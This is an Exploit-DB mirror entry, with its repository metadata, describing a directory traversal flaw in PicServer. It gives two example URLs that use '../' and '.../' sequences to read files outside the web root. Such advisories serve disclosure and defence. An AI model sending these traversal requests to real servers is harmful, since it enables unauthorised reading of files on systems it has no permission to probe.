exploit-db-mirror/platforms/windows/remote/20612.txt
Offensive Security 5e2fc10125 DB: 2016-09-03
2016-09-03 13:13:25 +00:00

6 lines
No EOL
374 B
Text
Executable file

source: http://www.securityfocus.com/bid/2339/info
It is possible for a remote user to gain read access to directories and files outside the root directory of a PicServer. Requesting a specially crafted URL composed of '../' or '.../' sequences will disclose an arbitrary directory.
http://target/../[file outside web root]
http://target/.../[file outside web root]